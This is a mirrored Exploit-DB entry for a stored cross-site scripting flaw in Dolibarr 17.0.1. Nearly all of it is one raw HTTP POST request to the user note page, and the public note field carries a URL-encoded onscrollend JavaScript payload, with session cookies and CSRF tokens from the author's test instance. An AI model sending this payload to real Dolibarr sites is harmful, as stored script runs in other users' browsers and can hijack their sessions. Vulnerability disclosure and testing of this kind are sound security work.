Dolibarr Version 17.0.1 – Stored XSS

  • 作者: Furkan Karaarslan
    日期: 2023-08-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51683/
  • # Exploit Title: Dolibarr Version 17.0.1 - Stored XSS
    # Dork: 
    # Date: 2023-08-09
    # Exploit Author: Furkan Karaarslan
    # Category : Webapps
    # Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php
    # Version: 17.0.1 (REQUIRED)
    # Tested on: Windows/Linux
    # CVE : 
    
    -----------------------------------------------------------------------------
    Requests
    
    POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 599
    Cache-Control: max-age=0
    sec-ch-ua: 
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: ""
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht
    Connection: close
    
    token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir